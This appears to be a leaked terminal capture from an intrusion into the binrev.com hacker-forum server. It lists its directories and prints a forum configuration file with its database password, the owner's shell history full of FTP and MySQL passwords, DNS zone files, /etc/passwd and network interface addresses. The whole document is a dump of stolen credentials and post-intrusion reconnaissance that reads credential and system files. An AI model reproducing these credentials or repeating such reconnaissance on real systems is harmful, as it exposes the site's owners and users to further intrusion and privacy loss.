lrwxrwxrwx   1 root   root    11 Apr    5  2007 www -> public_html/
binrev@binrev.com [/home/binrev/mail/binrev.com]# ls -al
total 152
drwxr-x---  19 binrev binrev 4096 Jan  2  2008 ./
drwxrwx---  41 binrev binrev 4096 Jul 14 00:41 ../
drwxr-xr-x  10 binrev binrev 4096 Apr  5  2007 articles/
drwxr-xr-x   6 binrev binrev 4096 Apr  5  2007 bitbucket/
drwxr-x---  10 binrev binrev 4096 Apr  5  2007 drzigman/
drwxr-x---   5 binrev binrev 4096 Apr  5  2007 forums/
drwxr-xr-x   7 binrev binrev 4096 Apr  5  2007 hackradio/
drwxr-x---   6 binrev binrev 4096 Apr  5  2007 hacktv/
drwxr-x---   5 binrev binrev 4096 Apr  5  2007 hiddenemail/
drwxr-xr-x   8 binrev binrev 4096 Apr  5  2007 letters/
drwxr-x---   5 binrev binrev 4096 Apr  5  2007 mentorship/
drwxr-x---   8 binrev binrev 4096 May 26  2008 nicktest/
drwxr-xr-x   6 binrev binrev 4096 Apr  5  2007 notes/
drwxr-xr-x  14 binrev binrev 4096 Apr  5  2007 orders/
drwxr-xr-x  15 binrev binrev 4096 Apr  5  2007 radio/
drwxr-xr-x  15 binrev binrev 4096 Aug 29  2008 stankdawg/
drwxr-x---   5 binrev binrev 4096 Jan  2  2008 test/
drwxr-x---   5 binrev binrev 4096 Apr  5  2007 verbal/
drwxr-x---  13 binrev binrev 4096 Apr  5  2007 zer0db/
binrev@binrev.com [/home/binrev/mail/binrev.com]# cd ../../www
binrev@binrev.com [/home/binrev/www]# ls -al
total 5660
drwxr-x---  33 binrev nobody    4096 Jul 14 10:37 ./
drwx--x--x  22 binrev binrev    4096 Jul 16 09:37 ../
-rw-r--r--   1 binrev binrev     616 Jul 14 10:37 .htaccess
-rw-r--r--   1 binrev binrev   11930 Aug 12  2006 SecRet.html
drwxr-xr-x   2 binrev binrev    4096 Dec 27  2007 Templates/
-rw-r--r--   1 binrev binrev    1754 Jan 29  2005 _vti_inf.html
drwxr-xr-x   3 binrev binrev    4096 Aug 12  2007 agent/
-rw-r--r--   1 binrev binrev    3924 Apr  8  2007 backup.htaccess
drwxr-xr-x   2 binrev binrev    4096 Oct 14  2007 binrevhometest/
drwxr-xr-x   6 binrev binrev    4096 May 13  2007 breakmag/
-rw-r--r--   1 binrev binrev     894 Jul 17  2005 brfavicon.ico
-rw-r--r--   1 binrev binrev    1785 May  3  2008 cert_emails.txt
drwxr-xr-x   2 binrev binrev    4096 Apr  5  2007 cgi-bin/
drwxr-xr-x   3 binrev binrev    4096 Apr 20  2007 contact/
-rw-r--r--   1 binrev binrev   12384 Aug 12  2006 contact.html
drwxr-xr-x   3 binrev binrev    4096 Apr 20  2007 contacts/
-rw-r--r--   1 binrev binrev 5315298 Jul 16 06:59 error_log
drwxr-xr-x   2 binrev binrev    4096 Apr  5  2007 errors/
-rw-r--r--   1 binrev binrev   22425 Aug 12  2006 faq.html
-rw-r--r--   1 binrev binrev     894 Sep 25  2005 favicon.ico
drwxr-xr-x   2 root   root    4096 Dec 28  2007 fghhj-keyfile/
drwxr-xr-x   3 binrev binrev    4096 Apr  1 16:29 forum/
drwxr-xr-x   4 binrev binrev    4096 Jul 17 03:08 forumbackups/
drwxr-xr-x  35 binrev binrev    4096 Jul 19 15:23 forums/
drwxr-xr-x   2 binrev binrev    4096 Apr  5  2007 forums_ads/
drwxr-xr-x  23 binrev binrev    4096 Apr  5  2007 forums_tempdel/
drwxr-xr-x  36 binrev binrev    4096 Jul 16 14:02 forumsdev/
drwxr-xr-x  22 binrev binrev    4096 Apr  5  2007 forumsdev-temptodel/
drwxr-xr-x  26 binrev binrev    4096 Aug 31  2007 forumsdev-temptodel2/
drwxr-xr-x   3 binrev binrev    4096 Apr 20  2007 gallery/
-rw-r--r--   1 binrev binrev    2982 Apr  1  2007 hacked.index.html
-rw-r--r--   1 binrev binrev    3555 Apr  1  2007 hacked2.index
drwxr-xr-x   3 binrev binrev    4096 Apr  5  2007 hacktv/
drwxr-xr-x   2 binrev binrev    4096 Apr  5  2007 images/
-rw-r--r--   1 binrev binrev      84 Oct 14  2007 index\ -\ Copy.php
-rw-r--r--   1 binrev binrev   30162 Oct  8  2007 index.html
-rw-r--r--   1 binrev binrev      84 Oct 14  2007 index.php
drwxr-xr-x   3 binrev binrev    4096 Apr  5  2007 irc/
drwxr-xr-x   6 binrev binrev    4096 Aug 18  2007 magazine/
drwxr-xr-x   3 binrev binrev    4096 Apr 20  2007 meeting/
drwxr-xr-x   3 binrev binrev    4096 Apr 20  2007 meetings/
drwxr-xr-x   3 binrev binrev    4096 Jun 28 14:50 members/
-rw-r--r--   1 binrev binrev     330 Jun 18  2006 moving.html
drwxr-xr-x   9 binrev binrev    4096 Apr 24  2007 projects/
drwxr-xr-x   6 binrev binrev    4096 Nov  6  2007 radio/
drwxr-xr-x   4 binrev binrev    4096 Oct 31  2007 site/
drwxr-xr-x   2 binrev binrev    4096 Apr  5  2007 suspended.page/
drwxr-xr-x   4 binrev binrev    4096 Aug 29  2007 temp_defcon_15_audio/
drwxr-xr-x   2 binrev binrev    4096 Oct 10  2008 temp_defcon_16_audio/
binrev@binrev.com [/home/binrev/www/forums]# ls -al
total 1532
drwxr-xr-x  35 binrev binrev   4096 Jul 19 15:23 ./
drwxr-x---  33 binrev nobody   4096 Jul 14 10:37 ../
-rw-r--r--   1 binrev binrev    179 Apr 20  2007 .htaccess
drwxr-xr-x   3 binrev binrev   4096 Jul 19 15:54 Tools/
drwxr-xr-x  12 binrev binrev   4096 Jul 16 15:43 admin/
-rw-r--r--   1 binrev binrev   1247 Feb  2  2008 admin.php
-rw-r--r--   1 binrev binrev  21372 Sep  6  2007 backup_index.php
drwxrwxrwx   2 binrev binrev   4096 Oct 26  2007 banners/
drwxr-xr-x  13 binrev binrev   4096 Jul  5 19:43 blog/
drwxr-xr-x   6 binrev binrev   4096 Oct  4  2008 blog_setup/
-rw-r--r--   1 binrev binrev    894 Jul 17  2005 brfavicon.ico
drwxr-xr-x   8 binrev binrev   4096 Jul 17 07:34 cache/
drwxr-xr-x   2 binrev binrev   4096 Apr 20  2007 cgi-bin/
-rw-r--r--   1 binrev binrev    527 Jul 16 15:43 conf_global.dist.php
-rwxrwxrwx   1 binrev binrev   6821 Jul  7 20:43 conf_global.php*
-rw-r--r--   1 binrev binrev      0 Jun 14  2007 conf_global.php.dist
drwxr-xr-x   3 binrev binrev   4096 Jul 16 15:46 converge_local/
-rw-r--r--   1 binrev binrev 379181 Jul 19 15:23 error_log
-r--r--r--   1 binrev binrev    894 Dec 19  2007 favicon.ico
drwxr-xr-x   2 binrev binrev  12288 Jul  6 17:45 flags/
drwxr-xr-x  27 binrev binrev   4096 Oct  4  2008 gallery_setup/
-rw-r--r--   1 binrev binrev  76350 Jul 26  2006 gallery_templates.xml
drwxr-xr-x   2 binrev binrev   4096 Jul 10 01:12 hooks/
-rw-r--r--   1 binrev binrev   1286 Jul 19 15:23 i.php
-rw-r--r--   1 binrev binrev    703 Jul 16 15:43 index.php
-rw-r--r--   1 binrev binrev   9034 Oct  4  2008 init.php
-rw-r--r--   1 binrev binrev   9804 Jul 16 15:43 initdata.php
drwxr-xr-x   7 binrev binrev   4096 Apr  7  2008 install/
drwxr-xr-x   5 binrev binrev   4096 Jul 16 15:46 interface/
-rw-r--r--   1 binrev binrev 439893 Apr 29  2006 ipb_templates.xml
-rw-r--r--   1 binrev binrev   7678 Apr 29  2006 ipchat.php
drwxr-xr-x  10 binrev binrev   4096 Jul 16 15:46 ips_kernel/
drwxr-xr-x   5 binrev binrev   4096 Oct  4  2008 jscripts/
-rw-r--r--   1 binrev binrev      0 Mar 10  2007 local_93672.xml
drwxr-xr-x   2 binrev binrev   4096 Jul 16 15:46 lofiversion/
drwxr-xr-x   2 binrev binrev   4096 Sep  6  2007 media/
drwxr-xr-x   2 binrev binrev   4096 Sep  6  2007 mod_install/
drwxr-xr-x   4 binrev binrev   4096 Oct  4  2008 modules/
-rw-r--r--   1 binrev binrev   1406 Jan 21  2007 oldfavicon.ico
-rw-r--r--   1 binrev binrev   1406 Apr 29  2006 original_favicon.ico
drwxr-xr-x  11 binrev binrev   4096 Jul 16 15:46 public/
drwxr-xr-x   5 binrev binrev   4096 Apr 29  2006
rename_me_back_to_just_install/
drwxr-xr-x   7 binrev binrev   4096 Jan 21  2007
rename_me_back_to_just_install2/
drwxr-xr-x   4 binrev binrev   4096 Oct  4  2008 resources/
drwxr-xr-x   2 binrev binrev   4096 Jul 16 15:47 retail/
-rw-r--r--   1 binrev binrev   2153 Jul 16 15:43 robotstxt.txt
drwxr-xr-x   4 binrev binrev   4096 Feb  2  2008 skin_acp/
drwxr-xr-x  18 binrev binrev   4096 Oct  4  2008 sources/
drwxr-xr-x   4 binrev binrev   4096 Feb  2  2008 style_avatars/
drwxr-xr-x   4 binrev binrev   4096 Oct  4  2008 style_captcha/
drwxr-xr-x   3 binrev binrev   4096 Feb  2  2008 style_emoticons/
drwxr-xr-x  11 binrev binrev   4096 Apr  2 15:46 style_images/
drwxr-xr-x   9 binrev binrev   4096 Oct  4  2008 upgrade/
drwxr-xr-x  36 binrev binrev 163840 Jul 17 20:50 uploads/
drwxr-xr-x  35 binrev binrev   4096 Mar 21 03:40 uploads_gallery/
-rw-r--r--   1 binrev binrev    684 Jul 16 15:43 xml.php
binrev@binrev.com [/home/binrev/www/forums]# cat conf_global.php
~~~~ snippy snippy ~~~~~
<?php
$INFO['admin_group']                    =       '4';
$INFO['ban_email']                      =       '*@willhackforfood.biz|*@dodgeit.com|*@mailinator.com';
$INFO['ban_ip']                 =       '141.217.173.*|141.217.174.*|141.217.*.*|68.113.11.79|65.237.*.*';
$INFO['base_dir']                       =       '/home/binrev/public_html/forums/';
$INFO['board_desc']                     =       'Website forums';
$INFO['board_name']                     =       'Binary Revolution Forums';
$INFO['board_start']                    =       '1064288753';
$INFO['board_url']                      =       
(isset($_SERVER['HTTPS'])) ? 'https://www.binrev.com/forums' : 'http://www.binrev.com/forums';
$INFO['boardname']                      =       'IBForums';
$INFO['home_name']                      =       'Binary Revolution';
$INFO['home_url']                       =       'http://www.binrev.com/';
$INFO['hot_topic']                      =       '15';
$INFO['html_dir']                       =       '/home/binrev/public_html/forums/html/';
$INFO['html_url']                       =       'http://www.binrev.com/forums/html';
$INFO['img_ext']                        =       'gif|jpeg|jpg|png';
$INFO['sql_database']                   =       'binrev_forums';
$INFO['sql_debug']                      =       '0';
$INFO['sql_driver']                     =       'mySQL';
$INFO['sql_host']                       =       'localhost';
$INFO['sql_pass']                       =       '2427821378a';
$INFO['sql_port']                       =       '';
$INFO['sql_tbl_prefix']                 =       'ibf_';
$INFO['sql_user']                       =       'binrev_forums';
$INFO['start_year']                     =       '2003';
$INFO['startpoll_cutoff']                       =  '24';
binrev@binrev.com [/home/binrev]# cat .bash_history
33revolutionizeyourself
dir
cd public_ht
cd public_html/
cd ar
cd archive
dir
cd radio
cd ar*
dir
wget -nd -c -r
ftp://binrev:revolutionizeyourself@70.84.52.210/public_html/radio/archive/
./wget -nd -c -r
ftp://binrev:revolutionizeyourself@70.84.52.210/public_html/radio/archive/
ftp binrev:revolutionizeyourself@70.84.52.210
dir
cd public_html
dir
mkdir forums11
cd forums11
ftp
chmod 755 /usr/bin/wget
wget
wget
wget
cd ..
dir
cd archive
cd radio
cd archive
dir
wget -nd -c -r
ftp://binrev:revolutionizeyourself@70.84.52.210/public_html/radio/archive/
cd /home/binrev/public_html/forumbackups/
dir
php -v
backup.php
php backup.php
php backup.php
dir
mysqldump --opt -ubinrev_forums -pdghousefrms773 binrev_forums | more
mysql -ubinrev_forums -pdghousefrms773 -Dbinrev_forums
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums
dir
cd www
cd forums11
dir
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums> existingback.sql
dir
mysqldump -ubinrev_forums -p3brfbrfbrf binrev_forums> existingback2.sql
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums
mysqldump --opt -ubinrev_forums -p3brfbrfbrf binrev_forums
dir
gzip --help
dir
gzip --help
gzip -dc
gzip -cd 2007-01-27--05-58-46__sqlbackup.gz
gzip -cd 2007-01-27--05-58-46__sqlbackup.gz
mysql -ubinrev_forums -p3brfbrfbrf binrev_forums
gzip -cd 2007-01-27--05-58-46__sqlbackup.gz | mysql -ubinrev_forums
-p3brfbrfbrf binrev_forums
gzip -d 2007-01-27--05-58-46__filebackup.gz
tar --help
tar -xf 2007-01-27--05-58-46__filebackup
dir
dir
cd www
dir
mysql -ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
dir
cd for*
cd ..
cd forumsdev-temptodel/
mysqldump -ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev >
dbbackup-123.sql
mysqldump --opt -ubinrev_forums -p2427821378a binrev_forums
mysqldump --opt -ubinrev_forums -p2427821378a binrev_forums | mysql
-ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
mysqldump -ubinrev_forums -p2427821378a binrev_forums | mysql
-ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
cd ..
cd for*
dir
gzip --help
gzip -c sqlbackup.gz
dir
cd www
cd forumsb
cd forumsb
cd forumsb
cd forumsbackup
dir
cd forumbackups
dir
ls -l
gzip --help
gzip -c -d sqlbackup.gz
gzip -c -d sqlbackup.gz | mysql -ubinrev_forumsdev -pdghousefrmsdev773
binrev_forumsdev
dir
cd www
cp forums forumsdev -r
mysql -ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
cd www
cd forumbackups/
tail -F log.txt
cat log.txt
tail -F log.txt | more
tail -F log.txt | more
cat log.txt | more
cat log.tx
cat log.txt
cat log.txt
tail log.txt
tail log.txt
tail -F log.txt | more
tail -F log.txt | more
mysql -ubinrev_forums -p2427821378a binrev_forums
dir
cd www
cd forumsb*
dir
cd forumbackups/
dir
backup.php > log.txt
php backup.php > log.txt
php backup.php > log.txt
echo "Subject: test" | /usr/lib/sendmail -v n84@mybox.rootsecure.net
cd ..
cd ..
echo "Subject: test" | /usr/lib/sendmail -v tehbizz@gmail.com
dir
cd nick84*
dir
cd ..
dir
cd nick8*
rm *
rm -r *
dir
ftp 72.232.34.250
dir
pwd
ftp 72.232.34.250
dir
cd www
vi aa.php
rm aa.php
cd ..
dir
cd nick84*
dir
gzip --help
gzip -d sqlbackup.gz
gzip -d sqlbackup.gz
dir
ls -l
rm sqlbackup
dir
mysql -ubinrev_forums -p2427821378a
dir
cd ..
dir
cd forums
di
cd www
dir
cd forums
dir
cd ..
cd ..
cd nick84-temp/
dir
tar --help
tar -zxf filebackup.tar.gz
dir
gzip --help
gzip -d sqlbackup.gz
dir
cat sqlbackup | more
dir
cat sqlbackup | mysql -ubinrev_forums -p2427821378a
mysql -ubinrev_forums -p2427821378a binrev_forums
cat sqlbackup | mysql -ubinrev_forums -p2427821378a binrev_forums
ifconfig
cd www
cd forumbac*
crontab -l
cd /home/binrev/public_html/forumbackups;php -q backup.php
pwd
ls -l
cd www
ls -l
cd forumba*
dir
ls -l
ls -l ../forums
crontab -l
cd /home/binrev/public_html/forumbackups;php -q backup.php
cd www
cd forumb*
dir
ls -l
mv asdf
mv sqlbackup.gz.gpg asdf
mv asdf sqlbackup.gz.gpg
cd forumsb
cd public_
cd public_html/
cd forumsb
dir
cd forumbackups/
dir
php backup.php
mysql -ubinrev_forums -p2427821378a binrev_forums
locate -n 1 .ttf
ls
cd www
crontab -e
cd forumbackups/
ls
crontab --help
crontab -l
php -q backup.php
ls
cd www
ls
ls -
cd www
ls -l
ls -l|grep bac
cd forumbackups/
ls
php backup.php
ls
cd www/
ls
cd forumbackups/
ls
php5 backup.php
php backup.php
ls
cd public_
cd www
cd backup.htaccess
cd forumbackups/
ls
php backup.php
mysql
history|grep mysql
mysql -ubinrev_forums -p2427821378a binrev_forums
ls
cd public_
cd public_html/
cd backup.htaccess
cd forumbackups/
ls
php backup.php
ls
cd www
ls
ls -l
cp -r forums forumsdev
cp -r forums forumsdev
mysqldump -ubinrev_forums -p2427821378a binrev_forums
mysql -ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
mysqldump -ubinrev_forums -p2427821378a binrev_forums | mysql
-ubinrev_forumsdev -pdghousefrmsdev773 binrev_forumsdev
ls
ls -lsaF
ls -lsa
ls -lsaF
cd public_html/
ls
ls -lsaF
logout
binrev@binrev.com [/home/binrev]# cat .mysql_history
show tables;
show databases;
show tables;
ALTER TABLE ibf_attachments_type ADD index(atype_extension);
DELETE FROM ibf_admin_permission_keys WHERE perm_key='content:mem:add';
ALTER TABLE ibf_upgrade_history CHANGE upgrade_notes upgrade_notes TEXT NULL;
ALTER TABLE ibf_attachments_type ADD INDEX atype ( atype_post , atype_photo );
ALTER TABLE ibf_moderator_logs CHANGE query_string query_string TEXT NULL;
ALTER TABLE ibf_rss_import CHANGE rss_import_url rss_import_url TEXT NULL;
show tables;
show databases;
show tables;
ALTER TABLE ibf_forums CHANGE last_title last_title VARCHAR( 250 ) NULL DEFAULT
NULL , CHANGE newest_title newest_title VARCHAR( 250 ) NULL DEFAULT NULL ;
CREATE TABLE ibf_skin_url_mapping ( map_id INT(10) NOT NULL auto_increment,
map_title VARCHAR(200) NOT NULL default '', map_match_type VARCHAR(10) NOT NULL
default 'contains', map_url VARCHAR(200) NOT NULL default '', map_skin_set_id
INT(10) UNSIGNED NOT NULL default '0', map_date_added INT(10) UNSIGNED NOT NULL
default '0', PRIMARY KEY (map_id) );
ALTER TABLE ibf_mail_queue ADD mail_html_on INT(1) NOT NULL default '0';
ALTER TABLE ibf_skin_templates ADD group_names_secondary TEXT NULL;
CREATE TABLE ibf_skin_template_links ( link_id INT(10) UNSIGNED NOT NULL
auto_increment, link_set_id INT(10) UNSIGNED NOT NULL default '0',
link_group_name VARCHAR(255) NOT NULL default '', link_template_name
VARCHAR(255) NOT NULL default '', link_used_in VARCHAR(255) NOT NULL default
'', PRIMARY KEY (link_id) );
alter table ibf_topics add index last_post_sorting(last_post,forum_id);
alter table ibf_profile_comments drop index my_comments;
alter table ibf_profile_comments add index my_comments
(comment_for_member_id,comment_date);
ALTER TABLE ibf_sessions ADD INDEX ( running_time );
ALTER TABLE ibf_conf_settings DROP conf_help_key;
CREATE TABLE ibf_acp_help ( id INT( 10 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
is_setting TINYINT( 1 ) NOT NULL DEFAULT '0', page_key VARCHAR( 255 ) NULL ,
help_title VARCHAR( 255 ) NULL , help_body TEXT NULL , help_mouseover VARCHAR(
255 ) NULL , KEY page_key ( page_key ) );
ALTER TABLE ibf_skin_sets ADD set_key VARCHAR( 32 ) NULL ;
ALTER TABLE ibf_skin_sets ADD INDEX ( set_key ) ;
DELETE FROM ibf_acp_help WHERE page_key='coppa_address' AND is_setting=1;
show tables
;
binrev@binrev.com [/home/binrev]# ls -al /var/named
total 328
drwxr-xr-x   5 root  named 4096 Jul  5 17:36 ./
drwxr-xr-x  26 root  root  4096 Apr 28 00:15 ../
-rw-r--r--   1 named named 1718 Apr  1 16:29 binrev.com.db
-rw-r--r--   1 named named 1153 Apr  1 16:29 binrevmeetings.com.db
-rw-r--r--   1 named named  677 Apr  1 16:29 break-mag.com.db
-rw-r--r--   1 named named  713 Apr  1 16:29 breakmagazine.net.db
-rw-r--r--   1 named named  713 Apr  1 16:29 breakmagazine.org.db
drwxr-xr-x   5 named named 4096 Mar 30    2007 chroot/
drwxrwx---   2 named named 4096 Apr 17 19:06 data/
-rw-r--r--   1 named named  703 Apr  1 16:29 ddphackradio.org.db
-rw-r--r--   1 named named  739 Apr  1 16:29 digitaldawgpound.org.db
-rw-r--r--   1 named named  694 Apr  1 16:29 docdroppers.org.db
-rw-r--r--   1 named named  858 Apr  1 16:29 dontmakemekickyourass.com.db
-rw-r--r--   1 named named  692 Apr  1 16:29 emeraldrain.com.db
-rw-r--r--   1 named named  660 Apr  6    2007 front.suchascream.net.db
-rw-r--r--   1 named named  806 Apr  1 16:29 frontalot.com.db
-rw-r--r--   1 named named  703 Apr  1 16:29 hackerevents.org.db
-rw-r--r--   1 named named  721 Apr  1 16:29 hackerexchange.com.db
-rw-r--r--   1 named named 1792 Apr  1 16:29 hackermedia.org.db
-rw-r--r--   1 named named  694 Apr  1 16:29 hackerparty.org.db
-rw-r--r--   1 named named  747 Apr  1 16:29 hackerpublicradio.org.db
-rw-r--r--   1 named named  649 Apr  1 16:29 hacktv.org.db
-rw-r--r--   1 named named  198 Jun 24    2008 localdomain.zone
-rw-r--r--   1 named named  195 Jun 24    2008 localhost.zone
-rw-r--r--   1 named named  415 Jun 24    2008 named.broadcast
-rw-r--r--   1 named named 2878 Jun 24    2008 named.ca
-rw-r--r--   1 named named  432 Jun 24    2008 named.ip6.local
-rw-r--r--   1 named named  433 Jun 24    2008 named.local
-rw-r--r--   1 named named  416 Jun 24    2008 named.zero
-rw-r--r--   1 named named  721 Apr  1 16:29 oldskoolphreak.com.db
-rw-r--r--   1 named named  750 Apr  1 16:29 omgmydickisonfire.com.db
-rw-r--r--   1 named named  785 Apr  1 16:29 projectwalmartfreedom.com.db
drwxrwx---   2 named named 4096 Apr 17 19:06 slaves/
-rw-r--r--   1 named named  676 Apr  1 16:29 stankdawg.com.db
-rw-r--r--   1 named named  910 Apr  1 16:29 thatplacewhereiputthatthingthattime.com.db
-rw-r--r--   1 named named  722 Apr  1 16:29 walmartfreedom.com.db
-rw-r--r--   1 named named  676 Apr  1 16:29 wartyping.com.db
-rw-r--r--   1 named named  631 Apr  1 16:29 wh4f.org.db
-rw-r--r--   1 named named  730 Apr  1 16:29 willhackforfood.biz.db
-rw-r--r--   1 named named  631 Apr  1 16:29 yapl.org.db
-rw-r--r--   1 named named  655 Apr  1 16:29 zearle.com.db

binrev@binrev.com [/home/binrev]# last
root     pts/1          99-159-213-65.li Tue Jul    7 20:40 - 20:44  (00:03)

wtmp begins Tue Jul  7 20:40:35 2009
binrev@binrev.com [/home/binrev]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM
services:/var/lib/Pegasus:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
kickass:x:32008:32009::/home/kickass:/usr/local/cpanel/bin/jailshell
hacktv:x:32012:32013::/home/hacktv:/usr/local/cpanel/bin/jailshell
ospadmin:x:32013:32014::/home/ospadmin:/usr/local/cpanel/bin/noshell
trashing:x:32014:32015::/home/trashing:/usr/local/cpanel/bin/jailshell
zearle:x:32019:32020::/home/zearle:/usr/local/cpanel/bin/noshell
clamav:x:32021:32022::/usr/local/clamav:/bin/false
munin:x:32022:32023::/home/munin:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
dropper:x:32023:32024::/home/dropper:/usr/local/cpanel/bin/jailshell
hmedia:x:32024:32025::/home/hmedia:/usr/local/cpanel/bin/jailshell
stankdaw:x:32025:32026::/home/stankdaw:/bin/bash
meetings:x:32026:32027::/home/meetings:/usr/local/cpanel/bin/noshell
hevents:x:32027:32028::/home/hevents:/usr/local/cpanel/bin/noshell
wh4forg:x:32028:32029::/home/wh4forg:/bin/bash
homeless:x:32029:32030::/home/homeless:/usr/local/cpanel/bin/noshell
hackrad:x:32030:32031::/home/hackrad:/bin/bash
hparty:x:32031:32032::/home/hparty:/usr/local/cpanel/bin/noshell
yaplorg:x:32032:32033::/home/yaplorg:/usr/local/cpanel/bin/noshell
locator:x:32033:32034::/home/locator:/usr/local/cpanel/bin/jailshell
wartyper:x:32034:32035::/home/wartyper:/usr/local/cpanel/bin/noshell
binrev:x:32035:32036::/home/binrev:/usr/local/cpanel/bin/jailshell
front:x:32036:32037::/home/front:/usr/local/cpanel/bin/jailshell
digdawg:x:32037:32038::/home/digdawg:/usr/local/cpanel/bin/jailshell
breakmag:x:32040:32041::/home/breakmag:/usr/local/cpanel/bin/jailshell
break2:x:32041:32042::/home/break2:/usr/local/cpanel/bin/noshell
break3:x:32042:32043::/home/break3:/usr/local/cpanel/bin/noshell
pwf:x:32043:32044::/home/pwf:/usr/local/cpanel/bin/jailshell
pwf2:x:32044:32046::/home/pwf2:/usr/local/cpanel/bin/jailshell
erain:x:32045:32047::/home/erain:/usr/local/cpanel/bin/noshell
hpr:x:32046:32048::/home/hpr:/usr/local/cpanel/bin/jailshell
cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpane
l/bin/noshell
cpanel-phpmyadmin:x:32004:32005::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/l
ocal/cpanel/bin/noshell
cpanel-phppgadmin:x:32005:32006::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/l
ocal/cpanel/bin/noshell
cpanelhorde:x:32006:32007::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/
bin/noshell
cpanelphpmyadmin:x:32007:32008::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc
al/cpanel/bin/noshell
cpanelphppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc
al/cpanel/bin/noshell
cpanelroundcube:x:32010:32011::/var/cpanel/userhomes/cpanelroundcube:/usr/local
/cpanel/bin/noshell
firedick:x:32047:32049::/home/firedick:/bin/bash
binrev@binrev.com [/home/binrev]# /sbin/ifconfig
eth1      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.157  Bcast:69.59.25.191  Mask:255.255.255.192
      inet6 addr: fe80::215:c5ff:fef3:40ae/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:1643775694 errors:0 dropped:0 overruns:0 frame:0
      TX packets:2945096654 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:66003292 (62.9 MiB)    TX bytes:4193177446 (3.9 GiB)
      Interrupt:169 Memory:f4000000-f4012100

eth1:1      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.158  Bcast:69.59.25.191  Mask:255.255.255.192
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:2      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.196  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:3      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.197  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:4      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.198  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:5      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
